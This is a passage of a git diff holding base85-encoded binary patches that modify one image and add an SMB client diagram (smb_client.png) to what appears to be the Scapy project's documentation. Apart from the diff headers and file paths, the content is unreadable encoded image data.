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 Q{_=UqNGOU|ivIHZKRRQ-(f|Me diff --git a/doc/scapy/graphics/smb/smb_client.png b/doc/scapy/graphics/smb/smb_client.png new file mode 100644 index 0000000000000000000000000000000000000000..be7abf7c4b63e263c5791a49e17206be420a479f GIT binary patch literal 157304 zcmcfpby!sI_XP|O-604l9TI|oV9+5FN{FCcWs2~VPNH@|U z-7)Z-z|Z%0z1REi^Q^5GIKrHB?$~?Zd#yd84<9Iz5z`YR5D2pS_vAGZ2pn$&0z01) zA9w|8HX8+e!L_=hb_andi6l9Bf(QJY)%>2O8Uo?Ng+L&K5r`w;CFCLk;eH)~ST;o< z#N!YMI;X^14N2fX@Xb_|=d#*=J4Jw45fR &R!2%~J@dy`N6gZA;)2sy+4;Q#0u$E{ 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 